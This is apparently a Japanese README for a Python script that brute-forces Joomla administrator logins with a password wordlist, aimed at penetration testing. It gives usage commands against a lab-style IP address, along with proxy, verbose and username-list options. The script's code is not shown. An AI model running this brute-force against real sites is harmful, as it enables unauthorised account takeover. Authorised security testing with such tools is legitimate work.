
Joomla管理者ログイン認証情報をワードリストでブルートフォースするPythonスクリプト。ペネトレーションテスト向けにプロキシおよび詳細出力オプションを備える。
Joomla ログイン総当たり攻撃
Joomla! 3.8.8 でテスト済み
使用方法:
python3 joomla-brute.py -u http://10.10.10.150 -w /usr/share/wordlist/rockyou.txt -usr admin
chmod +x joomla-brute.py
./joomla-brute.py -u http://10.10.10.150 -w /usr/share/wordlist/rockyou.txt -usr admin
オプションパラメータ:
-p または --proxy http://127.0.0.1:8080
-v または --verbose
-U または --userlist /usr/share/wordlists/SecLists/Usernames/Names/names.txt